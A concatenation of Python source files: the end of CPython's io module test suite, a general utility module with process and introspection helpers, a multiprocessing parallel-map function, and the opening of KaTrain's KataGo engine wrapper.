with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
        # because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
util.py
|
from typing import Optional, Callable, Union, Iterable, Any
from inspect import Parameter, signature
from multiprocessing.context import Process
from multiprocessing import Queue
from time import sleep, time
from functools import wraps, partial
from warnings import warn, simplefilter
from contextlib import contextmanager
from glom import Spec # NOTE: Third-party
class lazyprop:
"""
A descriptor implementation of lazyprop (cached property).
Made based on David Beazley's "Python Cookbook" book and enhanced with boltons.cacheutils ideas.
>>> class Test:
... def __init__(self, a):
... self.a = a
... @lazyprop
... def len(self):
... print('generating "len"')
... return len(self.a)
>>> t = Test([0, 1, 2, 3, 4])
>>> t.__dict__
{'a': [0, 1, 2, 3, 4]}
>>> t.len
generating "len"
5
>>> t.__dict__
{'a': [0, 1, 2, 3, 4], 'len': 5}
>>> t.len
5
>>> # But careful when using lazyprop that no one will change the value of a without deleting the property first
>>> t.a = [0, 1, 2] # if we change a...
>>> t.len # ... we still get the old cached value of len
5
>>> del t.len # if we delete the len prop
>>> t.len # ... then len being recomputed again
generating "len"
3
"""
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.__isabstractmethod__ = getattr(func, '__isabstractmethod__', False)
self.func = func
def __get__(self, instance, cls):
if instance is None:
return self
else:
value = instance.__dict__[self.func.__name__] = self.func(instance)
return value
def __repr__(self):
cn = self.__class__.__name__
return '<%s func=%s>' % (cn, self.func)
def if_not_empty(obj, if_empty_val=None):
if obj != Parameter.empty:
return obj
else:
return if_empty_val
none_if_not_empty = partial(if_not_empty, if_empty_val=None)
func_info_spec = Spec(
{
'name': '__name__',
'qualname': '__qualname__',
'module': '__module__',
'return_annotation': (signature, 'return_annotation', none_if_not_empty,),
'params': (signature, 'parameters'),
}
)
def py_obj_info(obj):
return func_info_spec.glom(obj)
def conditional_logger(verbose=False, log_func=print):
if verbose:
return log_func
else:
def clog(*args, **kwargs):
pass # do nothing
return clog
class CreateProcess:
"""A context manager to launch a parallel process and close it on exit.
"""
def __init__(
self,
proc_func: Callable,
process_name=None,
wait_before_entering=2,
verbose=False,
args=(),
**kwargs,
):
"""
Essentially, this context manager will call
```
proc_func(*args, **kwargs)
```
in an independent process.
:param proc_func: A function that will be launched in the process
:param process_name: The name of the process.
:param wait_before_entering: A pause (in seconds) before returning from the enter phase.
(in case the outside should wait before assuming everything is ready)
        :param verbose: If True, will print some info on the starting/stopping of the process
:param args: args that will be given as arguments to the proc_func call
:param kwargs: The kwargs that will be given as arguments to the proc_func call
The following should print 'Hello console!' in the console.
>>> with CreateProcess(print, verbose=True, args=('Hello console!',)) as p:
... print("-------> Hello module!") # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
Starting process: print...
... print process started.
-------> Hello module!
... print process terminated
"""
self.proc_func = proc_func
self.process_name = process_name or getattr(proc_func, '__name__', '')
self.wait_before_entering = float(wait_before_entering)
self.verbose = verbose
self.args = args
self.kwargs = kwargs
self.clog = conditional_logger(verbose)
self.process = None
self.exception_info = None
def process_is_running(self):
return self.process is not None and self.process.is_alive()
def __enter__(self):
self.process = Process(
target=self.proc_func,
args=self.args,
kwargs=self.kwargs,
name=self.process_name,
)
self.clog(f'Starting process: {self.process_name}...')
try:
self.process.start()
if self.process_is_running():
self.clog(f'... {self.process_name} process started.')
sleep(self.wait_before_entering)
return self
else:
raise RuntimeError('Process is not running')
except Exception:
raise RuntimeError(
f'Something went wrong when trying to launch process {self.process_name}'
)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.process is not None and self.process.is_alive():
self.clog(f'Terminating process: {self.process_name}...')
self.process.terminate()
self.clog(f'... {self.process_name} process terminated')
if exc_type is not None:
self.exception_info = dict(
exc_type=exc_type, exc_val=exc_val, exc_tb=exc_tb
)
@contextmanager
def run_process(
func: Callable,
func_args=(),
func_kwargs=None,
process_name=None,
is_ready: Union[Callable[[], Any], float, int] = None,
timeout=30,
force_kill=True,
verbose=False,
):
    """Context manager that runs ``func`` in a separate process, optionally waiting until
    ``is_ready`` (a predicate, or a number of seconds) says the process is ready, and
    terminating (if ``force_kill``) or joining the process on exit."""
def launch_process():
try:
print('starting process!...')
clog(f'Starting {process_name} process...')
process.start()
clog(f'... {process_name} process started.')
except Exception:
raise RuntimeError(
f'Something went wrong when trying to launch process {process_name}'
)
def launch_and_wait_till_ready(
start_process: Callable[[], Any],
is_ready: Union[Callable[[], Any], float, int] = 5.0,
check_every_seconds=1.0,
timeout=30.0,
):
"""A function that launches a process, checks if it's ready, and exits when it is.
        :param start_process: An argument-less function that launches an independent process
        :param is_ready: An argument-less function that returns False if, and only if, the process is not yet ready
:param check_every_seconds: Determines the frequency that is_ready will be called
:param timeout: Determines how long to wait for the process to be ready before we should give up
:return: start_process_output, is_ready_output
"""
start_time = time()
# If is_ready is a number, make an is_ready function out of it
if isinstance(is_ready, (float, int)):
is_ready_in_seconds = is_ready
def is_ready_func():
f"""Returns True if, and only if, {is_ready_in_seconds} elapsed"""
return time() - start_time >= is_ready_in_seconds
is_ready_func.__name__ = f'wait_for_seconds({is_ready_in_seconds})'
is_ready = is_ready_func
        start_process_output = start_process()  # needs to launch a parallel process!
while time() - start_time < timeout:
tic = time()
is_ready_output = is_ready()
if is_ready_output is False:
elapsed = time() - tic
sleep(max(0, check_every_seconds - elapsed))
else:
return start_process_output, is_ready_output
        # If we got this far, raise TimeoutError
raise TimeoutError(
f"Launching {getattr(start_process, '__qualname__', None)} "
f"and checking for readiness with {getattr(is_ready, '__qualname__', None)} "
            f'timed out (timeout={timeout}s)'
)
kwargs = func_kwargs or {}
clog = conditional_logger(verbose)
process_name = process_name or getattr(func, '__qualname__', '\b')
try:
process = Process(target=func, args=func_args, kwargs=kwargs, name=process_name)
if is_ready: # if the 'is_ready' time or predicate is defined
launch_and_wait_till_ready(launch_process, is_ready, timeout=timeout)
else:
launch_process()
yield process
finally:
if process is not None and process.is_alive():
if force_kill:
clog(f'Terminating process: {process_name}...')
process.terminate()
clog(f'... {process_name} process terminated')
else:
process.join()
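# Illustrative usage sketch for run_process (a minimal example under stated assumptions: this
# helper is not part of the original API, and time.sleep is only a stand-in for a real
# long-running task). is_ready=1.0 means "consider the child ready after one second"; on exit
# the context manager terminates the child because force_kill defaults to True.
def _example_run_process():
    with run_process(sleep, func_args=(30,), is_ready=1.0, timeout=10, verbose=True) as proc:
        assert proc.is_alive()  # the child is still sleeping at this point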
def deprecate(func=None, *, msg=None):
"""Decorator to emit a DeprecationWarning when the decorated function is called."""
if func is None:
return partial(deprecate, msg=msg)
else:
assert callable(func), f'func should be callable. Was {func}'
msg = msg or f'{func.__qualname__} is being deprecated.'
@wraps(func)
def deprecated_func(*args, **kwargs):
simplefilter('always', DeprecationWarning) # turn off filter
warn(msg, category=DeprecationWarning, stacklevel=2)
simplefilter('default', DeprecationWarning) # reset filter
return func(*args, **kwargs)
return deprecated_func
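# Illustrative usage sketch for the deprecate decorator above (a minimal example; the function
# names are invented for the illustration and are not part of the original module).
def _example_deprecate():
    @deprecate
    def old_add(x, y):
        return x + y
    @deprecate(msg='old_mul is deprecated; use operator.mul instead.')
    def old_mul(x, y):
        return x * y
    # Each call still works but emits a DeprecationWarning.
    return old_add(1, 2), old_mul(2, 3)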
class Missing:
"""A class to use as a value to indicate that something was missing"""
def __init__(self, val=None):
self.val = val
class Skip:
"""Class to indicate if one should skip an item"""
def obj_to_items_gen(
obj,
attrs: Iterable[str],
on_missing_attr: Union[Callable, Skip, None] = Missing,
kv_trans: Optional[Callable] = lambda k, v: (k, v)
if v is not Parameter.empty
else None,
):
"""Make a generator of (k, v) items extracted from an input object, given an iterable of attributes to extract
:param obj: A python object
:param attrs: The iterable of attributes to extract from obj
    :param on_missing_attr: What to do if an attribute is missing:
        - Skip: skip the item
        - a Callable: call it with the attribute name; the result is used as the value
        - anything else: use that object itself as the value
:param kv_trans:
:return: A generator
"""
    def gen():
        for k in attrs:
            v = getattr(obj, k, Missing)
            if v is Missing:
                if on_missing_attr is obj_to_items_gen.Skip:
                    continue  # skip this attribute entirely
                elif callable(on_missing_attr):
                    yield k, on_missing_attr(k)
                else:
                    yield k, on_missing_attr
            else:
                yield k, v
if kv_trans is not None:
assert callable(kv_trans)
assert list(signature(kv_trans).parameters) == [
'k',
'v',
], f'kv_trans must have signature (k, v)'
_gen = gen
def gen():
for k, v in _gen():
x = kv_trans(k=k, v=v)
if x is not None:
yield x
return gen
obj_to_items_gen.Skip = Skip
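# Illustrative usage sketch for obj_to_items_gen (a minimal example; the SimpleNamespace object
# is invented for the illustration and is not part of the original module).
def _example_obj_to_items_gen():
    from types import SimpleNamespace
    obj = SimpleNamespace(a=1, b=2)
    gen = obj_to_items_gen(obj, attrs=('a', 'b', 'c'), on_missing_attr=obj_to_items_gen.Skip)
    return dict(gen())  # -> {'a': 1, 'b': 2}; 'c' is skipped because obj has no such attribute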
class _pyparam_kv_trans:
"""A collection of kv_trans functions for pyparam_to_dict"""
@staticmethod
def skip_empties(k, v):
return (k, v) if v is not Parameter.empty else None
@staticmethod
def with_str_kind(k, v):
if v is Parameter.empty:
return None
elif k == 'kind':
return k, str(v)
else:
return k, v
def pyparam_to_dict(param, kv_trans: Callable = _pyparam_kv_trans.skip_empties):
"""Get dict from a Parameter object
:param param: A inspect.Parameter instance
:param kv_trans: A callable that will be called on the (k, v) attribute items of the Parameter instance
:return: A dict extracted from this Parameter
>>> from inspect import Parameter, Signature, signature
>>> from functools import partial
>>>
>>> def mult(x: float, /, y=1, *, z: int=1): ...
>>> params_dicts = map(pyparam_to_dict, signature(mult).parameters.values())
>>> # see that we can recover the original signature from these dicts
>>> assert Signature(map(lambda kw: Parameter(**kw), params_dicts)) == signature(mult)
    Now what about the kv_trans? Its default is made to return None when a value is equal to
    `Parameter.empty` (which is the way the inspect module distinguishes the `None` object from
    "it's just not there").
    But we could provide our own kv_trans, which should be a function taking a `(k, v)` pair
    (those k and v arg names are imposed!) and returning... well, whatever you want to return,
    really. But if you return None, the `(k, v)` item will be skipped.
    See how using `kv_trans=pyparam_to_dict.kv_trans.with_str_kind` does the job
    of skipping `Parameter.empty` items, but also casts the `kind` value to a string,
    so that it is jsonizable.
>>> params_to_jdict = partial(pyparam_to_dict, kv_trans=pyparam_to_dict.kv_trans.with_str_kind)
>>> got = list(map(params_to_jdict, signature(mult).parameters.values()))
>>> expected = [
... {'name': 'x', 'kind': 'POSITIONAL_ONLY', 'annotation': float},
... {'name': 'y', 'kind': 'POSITIONAL_OR_KEYWORD', 'default': 1},
... {'name': 'z', 'kind': 'KEYWORD_ONLY', 'default': 1, 'annotation': int}]
>>> assert got == expected, f"\\n got={got}\\n expected={expected}"
"""
gen = obj_to_items_gen(
param,
attrs=('name', 'kind', 'default', 'annotation'),
on_missing_attr=None,
kv_trans=kv_trans,
)
return dict(gen())
pyparam_to_dict.kv_trans = _pyparam_kv_trans
class ModuleNotFoundIgnore:
"""Context manager to ignore ModuleNotFoundErrors.
When all goes well, code is executed normally:
>>> with ModuleNotFoundIgnore():
... import os.path # test when the module exists
... # The following code is reached and executed
... print('hi there!')
... print(str(os.path.join)[:14] + '...') # code is reached
hi there!
<function join...
But if you try to import a module that doesn't exist on your system,
the block will be skipped from that point onward, silently.
>>> with ModuleNotFoundIgnore():
... import do.i.exist
... # The following code is NEVER reached or executed
... print(do.i.exist)
... t = 0 / 0
    But if there's any other kind of error (other than ModuleNotFoundError, that is),
    the error will be raised normally.
>>> with ModuleNotFoundIgnore():
... t = 0/0
Traceback (most recent call last):
...
ZeroDivisionError: division by zero"""
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is ModuleNotFoundError:
return True
# else:
# return True
class TypeAsserter:
"""Makes a callable that asserts that a value `v` has the expected type(s) that it's kind `k` should be
>>> assert_type = TypeAsserter({'foo': str, 'bar': (Callable, type(None))})
>>> assert_type('bar', lambda x: x)
>>> assert_type('bar', None)
>>> assert_type('foo', 'i am a string')
>>> assert_type('foo', list('i am not a string'))
Traceback (most recent call last):
...
AssertionError: Invalid foo type, must be a <class 'str'>, but was a <class 'list'>
If a kind wasn't specified, the default is to ignore
>>> assert_type('not_a_kind', 'blah')
>>> assert_type = TypeAsserter({'foo': str, 'bar': (Callable, type(None))}) # nothing happens
But you can choose to warn or raise an exception instead
>>> assert_type = TypeAsserter({'foo': str, 'bar': list}, if_kind_missing='raise')
>>> assert_type('not_a_kind', 'blah')
Traceback (most recent call last):
...
ValueError: Unrecognized kind: not_a_kind. The ones I recognize: ['foo', 'bar']
"""
def __init__(self, types_for_kind, if_kind_missing='ignore'):
self.types_for_kind = types_for_kind
assert if_kind_missing in {'ignore', 'raise', 'warn'}
self.if_kind_missing = if_kind_missing
def __call__(self, k, v):
types = self.types_for_kind.get(k, None)
if types is not None:
assert isinstance(
v, types
), f'Invalid {k} type, must be a {types}, but was a {type(v)}'
elif self.if_kind_missing == 'ignore':
pass
elif self.if_kind_missing == 'raise':
raise ValueError(
f'Unrecognized kind: {k}. The ones I recognize: {list(self.types_for_kind.keys())}'
)
elif self.if_kind_missing == 'warn':
from warnings import warn
warn(
f'Unrecognized kind: {k}. The ones I recognize: {list(self.types_for_kind.keys())}'
)
def path_to_obj(root_obj, attr_path):
"""Get an object from a root object and "attribute path" specification.
>>> class A:
... def foo(self, x): ...
... foo.x = 3
... class B:
... def bar(self, x): ...
...
>>> obj = path_to_obj(A, ('foo',))
>>> assert callable(obj) and obj.__name__ == 'foo'
>>> path_to_obj(A, ('foo', 'x'))
3
>>> obj = path_to_obj(A, ('B', 'bar'))
>>> assert callable(obj) and obj.__qualname__ == 'A.B.bar'
"""
obj = root_obj
for attr in attr_path:
obj = getattr(obj, attr)
return obj
# TODO: I'd like to find a better way to do this. Using globals() here.
# See https://stackoverflow.com/questions/62416006/getting-the-attribute-path-of-a-python-object
def obj_to_path(obj):
"""Quasi-inverse of obj_to_path: Get a root_obj and attr_path from an object.
Obviously, would only be able to work with some types (only by-ref types?).
>>> class A:
... def foo(self, x): ...
... foo.x = 3
... class B:
... def bar(self, x): ...
...
>>> for t in [(A, ('foo',)), (A, ('B',)), (A, ('B', 'bar'))]: # doctest: +SKIP
... print(obj_to_path(path_to_obj(*t)))
... print(t)
... print()
(<class 'util.A'>, ('foo',))
(<class 'util.A'>, ('foo',))
<BLANKLINE>
<class 'util.A.B'>
(<class 'util.A'>, ('B',))
<BLANKLINE>
(<class 'util.A'>, ('B', 'bar'))
(<class 'util.A'>, ('B', 'bar'))
<BLANKLINE>
# >>> for t in [(A, ('foo',)), (A, ('B',)), (A, ('B', 'bar'))]:
# ... assert obj_to_path(path_to_obj(*t)) == t
"""
if hasattr(obj, '__qualname__') and hasattr(obj, '__globals__'):
root_name, *attr_path = obj.__qualname__.split('.')
return obj.__globals__[root_name], tuple(attr_path)
else:
return obj
|
parallel_map.py
|
from torch import multiprocessing
from typing import Iterable, Callable, Any, List
import time
def parallel_map(tasks: Iterable, callback: Callable[[Any], Any], max_parallel: int = 32) -> List:
    """Apply ``callback`` to every task in a separate process, running at most ``max_parallel`` at once,
    and return the results in the order of the input tasks."""
limit = min(multiprocessing.cpu_count(), max_parallel)
processes: List[multiprocessing.Process] = []
queues: List[multiprocessing.Queue] = []
indices: List[int] = []
tlist = [t for t in tasks]
res = [None] * len(tlist)
curr = 0
def process_return(q, arg):
res = callback(arg)
q.put(res)
while curr < len(tlist):
if len(processes) == limit:
ended = []
for i, q in enumerate(queues):
if not q.empty():
processes[i].join()
ended.append(i)
res[indices[i]] = q.get()
for i in sorted(ended, reverse=True):
processes.pop(i)
queues.pop(i)
indices.pop(i)
if not ended:
time.sleep(0.1)
continue
queues.append(multiprocessing.Queue())
indices.append(curr)
processes.append(multiprocessing.Process(target=process_return, args=(queues[-1], tlist[curr])))
processes[-1].start()
curr += 1
for i, p in enumerate(processes):
res[indices[i]] = queues[i].get()
p.join()
return res
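# Illustrative usage sketch (a minimal example; math.sqrt is only a stand-in for real per-task
# work, and this helper is not part of the original module). The callback must be picklable,
# and with the 'spawn' start method the call should happen under an `if __name__ == '__main__'`
# guard.
def _example_parallel_map():
    import math
    return parallel_map(tasks=[1, 4, 9, 16], callback=math.sqrt, max_parallel=2)  # -> [1.0, 2.0, 3.0, 4.0]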
|
engine.py
|
import copy
import json
import os
import platform
import queue
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import Callable, Dict, List, Optional
from kivy.utils import platform as kivy_platform
from katrain.core.constants import OUTPUT_DEBUG, OUTPUT_ERROR, OUTPUT_EXTRA_DEBUG, OUTPUT_KATAGO_STDERR
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.sgf_parser import Move
from katrain.core.utils import find_package_resource, json_truncate_arrays
class EngineDiedException(Exception):
pass
class KataGoEngine:
"""Starts and communicates with the KataGO analysis engine"""
# TODO: we don't support suicide in game.py, so no "tt": "tromp-taylor", "nz": "new-zealand"
RULESETS_ABBR = [
("jp", "japanese"),
("cn", "chinese"),
("ko", "korean"),
("aga", "aga"),
("stone_scoring", "stone_scoring"),
]
RULESETS = {fromkey: name for abbr, name in RULESETS_ABBR for fromkey in [abbr, name]}
@staticmethod
def get_rules(node):
return KataGoEngine.RULESETS.get(str(node.ruleset).lower(), "japanese")
def __init__(self, katrain, config):
self.katrain = katrain
self.queries = {} # outstanding query id -> start time and callback
self.config = config
self.query_counter = 0
self.katago_process = None
self.base_priority = 0
self.override_settings = {"reportAnalysisWinratesAs": "BLACK"} # force these settings
self.analysis_thread = None
self.stderr_thread = None
self.write_stdin_thread = None
self.shell = False
self.write_queue = queue.Queue()
self.thread_lock = threading.Lock()
exe = config.get("katago", "").strip()
if config.get("altcommand", ""):
self.command = config["altcommand"]
self.shell = True
else:
if not exe:
if kivy_platform == "win":
exe = "katrain/KataGo/katago.exe"
elif kivy_platform == "linux":
exe = "katrain/KataGo/katago"
else:
exe = find_package_resource("katrain/KataGo/katago-osx") # github actions built
if not os.path.isfile(exe) or "arm64" in platform.version().lower():
exe = "katago" # e.g. MacOS after brewing
model = find_package_resource(config["model"])
cfg = find_package_resource(config["config"])
if exe.startswith("katrain"):
exe = find_package_resource(exe)
exepath, exename = os.path.split(exe)
if exepath and not os.path.isfile(exe):
self.katrain.log(i18n._("Kata exe not found").format(exe=exe), OUTPUT_ERROR)
return # don't start
elif not exepath:
paths = os.getenv("PATH", ".").split(os.pathsep) + ["/opt/homebrew/bin/"]
exe_with_paths = [os.path.join(path, exe) for path in paths if os.path.isfile(os.path.join(path, exe))]
if not exe_with_paths:
self.katrain.log(i18n._("Kata exe not found in path").format(exe=exe), OUTPUT_ERROR)
return # don't start
exe = exe_with_paths[0]
elif not os.path.isfile(model):
self.katrain.log(i18n._("Kata model not found").format(model=model), OUTPUT_ERROR)
return # don't start
elif not os.path.isfile(cfg):
self.katrain.log(i18n._("Kata config not found").format(config=cfg), OUTPUT_ERROR)
return # don't start
self.command = shlex.split(
f'"{exe}" analysis -model "{model}" -config "{cfg}" -analysis-threads {config["threads"]}'
)
self.start()
def start(self):
with self.thread_lock:
self.write_queue = queue.Queue()
try:
self.katrain.log(f"Starting KataGo with {self.command}", OUTPUT_DEBUG)
startupinfo = None
if hasattr(subprocess, "STARTUPINFO"):
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # stop command box popups on win/pyinstaller
self.katago_process = subprocess.Popen(
self.command,
startupinfo=startupinfo,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=self.shell,
)
